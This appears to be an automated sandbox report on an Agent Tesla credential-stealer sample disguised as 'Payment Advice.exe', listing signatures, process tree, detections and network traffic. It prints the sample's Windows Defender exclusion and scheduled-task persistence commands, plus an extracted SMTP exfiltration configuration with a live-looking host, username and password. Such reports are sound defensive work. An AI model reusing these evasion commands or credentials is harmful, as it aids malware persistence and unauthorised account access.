Windows Analysis Report
Payment Advice.exe

Overview

General Information

Sample name: Payment Advice.exe
Analysis ID: 1428252
MD5: f060b9400a263bea044a7789ec1d85d9
SHA1: 3e939ea522e4356fbdc15c7e0119366a6369e0c9
SHA256: 921ace6c0f27813fa370b65bcaee79824a4e31920dbdfec7652103c60e84cd23
Tags: AgentTesla, exe, Payment

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Payment Advice.exe (PID: 6700 cmdline: "C:\Users\user\Desktop\Payment Advice.exe" MD5: F060B9400A263BEA044A7789EC1D85D9)
    • powershell.exe (PID: 7116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7200 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7620 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7236 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Payment Advice.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\Payment Advice.exe" MD5: F060B9400A263BEA044A7789EC1D85D9)
  • sFPEKzHsLkYZIz.exe (PID: 7524 cmdline: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe MD5: F060B9400A263BEA044A7789EC1D85D9)
    • schtasks.exe (PID: 7756 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sFPEKzHsLkYZIz.exe (PID: 7816 cmdline: "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe" MD5: F060B9400A263BEA044A7789EC1D85D9)
  • BjTxJte.exe (PID: 7952 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: F060B9400A263BEA044A7789EC1D85D9)
    • schtasks.exe (PID: 8132 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpA082.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BjTxJte.exe (PID: 8188 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: F060B9400A263BEA044A7789EC1D85D9)
    • BjTxJte.exe (PID: 6576 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: F060B9400A263BEA044A7789EC1D85D9)
  • BjTxJte.exe (PID: 7492 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: F060B9400A263BEA044A7789EC1D85D9)
    • schtasks.exe (PID: 7672 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpC03F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BjTxJte.exe (PID: 4092 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: F060B9400A263BEA044A7789EC1D85D9)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.seawaysfreight-bd.com", "Username": "samsuddin@seawaysfreight-bd.com", "Password": "36@SaM%sFl#"}
Source | Rule | Description | Author | Strings
00000008.00000002.4124616083.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000008.00000002.4124616083.0000000002D31000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.Payment Advice.exe.4c84a08.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.Payment Advice.exe.4c84a08.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.Payment Advice.exe.4c84a08.2.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
  • 0x31e04:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x31e76:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x31f00:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31f92:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x31ffc:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3206e:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x32104:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x32194:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.sFPEKzHsLkYZIz.exe.4e65888.4.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
9.2.sFPEKzHsLkYZIz.exe.4e65888.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

                    System Summary

                    Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice.exe", ParentImage: C:\Users\user\Desktop\Payment Advice.exe, ParentProcessId: 6700, ParentProcessName: Payment Advice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", ProcessId: 7116, ProcessName: powershell.exe
                    Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Payment Advice.exe, ProcessId: 7404, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BjTxJte
                    Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, ParentImage: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, ParentProcessId: 7524, ParentProcessName: sFPEKzHsLkYZIz.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp", ProcessId: 7756, ProcessName: schtasks.exe
                    Source: Network Connection, Author: frack113: Data: DestinationIp: 94.100.26.91, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Payment Advice.exe, Initiated: true, ProcessId: 7404, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
                    Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice.exe", ParentImage: C:\Users\user\Desktop\Payment Advice.exe, ParentProcessId: 6700, ParentProcessName: Payment Advice.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp", ProcessId: 7236, ProcessName: schtasks.exe
                    Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice.exe", ParentImage: C:\Users\user\Desktop\Payment Advice.exe, ParentProcessId: 6700, ParentProcessName: Payment Advice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", ProcessId: 7116, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice.exe", ParentImage: C:\Users\user\Desktop\Payment Advice.exe, ParentProcessId: 6700, ParentProcessName: Payment Advice.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp", ProcessId: 7236, ProcessName: schtasks.exe
                    No Snort rule has matched

                    AV Detection

                    Source: 20.2.BjTxJte.exe.3d1f480.2.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.seawaysfreight-bd.com", "Username": "samsuddin@seawaysfreight-bd.com", "Password": "36@SaM%sFl#"}
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, ReversingLabs: Detection: 42%
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, ReversingLabs: Detection: 42%
                    Source: Payment Advice.exe, ReversingLabs: Detection: 39%
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Joe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Joe Sandbox ML: detected
                    Source: Payment Advice.exe, Joe Sandbox ML: detected
                    Source: Payment Advice.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49735 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49739 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49742 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49750 version: TLS 1.2
                    Source: Payment Advice.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Code function: 4x nop then jmp 06EE4434h 14_2_06EE3E4A
                    Source: global traffic, TCP traffic: 192.168.2.4:49738 -> 94.100.26.91:587
                    Source: Joe Sandbox View, IP Address: 104.26.13.205
                    Source: Joe Sandbox View, IP Address: 94.100.26.91
                    Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknown, DNS query: name: api.ipify.org
                    Source: global traffic, HTTP traffic detected: GET / HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Host: api.ipify.org
                        Connection: Keep-Alive
                    Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknown, DNS traffic detected: queries for: api.ipify.org
                    Source: Payment Advice.exe, BjTxJte.exe.8.dr, sFPEKzHsLkYZIz.exe.0.dr, String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: Payment Advice.exe, BjTxJte.exe.8.dr, sFPEKzHsLkYZIz.exe.0.dr, String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: Payment Advice.exe, sFPEKzHsLkYZIz.exe, BjTxJte.exe, String found in binary or memory: http://mail.seawaysfreight-bd.com
                    Source: Payment Advice.exe, BjTxJte.exe.8.dr, sFPEKzHsLkYZIz.exe.0.dr, String found in binary or memory: http://ocsp.comodoca.com0
                    Source: Payment Advice.exe, sFPEKzHsLkYZIz.exe, BjTxJte.exe, String found in binary or memory: http://r3.i.lencr.org/09
                    Source: Payment Advice.exe, sFPEKzHsLkYZIz.exe, BjTxJte.exe, String found in binary or memory: http://r3.o.lencr.org0
                    Source: Payment Advice.exe, sFPEKzHsLkYZIz.exe, BjTxJte.exe, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Payment Advice.exe, sFPEKzHsLkYZIz.exe, BjTxJte.exe, String found in binary or memory: http://seawaysfreight-bd.com
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.carterandcone.coml
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fontbureau.com
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fonts.com
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: Payment Advice.exe, 00000008.00000002.4119763177.000000000101B000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4171500763.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4169183072.0000000006281000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4119763177.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009210000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009225000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 
00000013.00000002.4116736214.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000309A000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: Payment Advice.exe, 00000008.00000002.4119763177.000000000101B000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4171500763.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4169183072.0000000006281000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4119763177.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009210000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009225000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 
00000013.00000002.4116736214.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000309A000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: Payment Advice.exe, 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 00000009.00000002.1760226964.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4115682058.0000000000431000.00000040.00000400.00020000.00000000.sdmp, BjTxJte.exe, 0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1933792023.0000000003CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Payment Advice.exe, 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 00000009.00000002.1760226964.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4115682058.0000000000431000.00000040.00000400.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.0000000002891000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1933792023.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.0000000002D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
